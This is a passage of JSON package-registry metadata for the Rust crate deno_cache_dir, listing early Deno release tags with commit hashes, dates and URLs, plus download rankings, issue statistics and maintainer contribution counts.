v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T09:39:12.062Z","dependent_packages_count":1,"downloads":810328,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":13.077606297778013,"dependent_repos_count":16.750609631030787,"dependent_packages_count":18.155229912562575,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":15.994481947123793},"purl":"pkg:cargo/deno_cache_dir","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cache_dir","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cache_dir","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cache_dir/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache_dir/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek 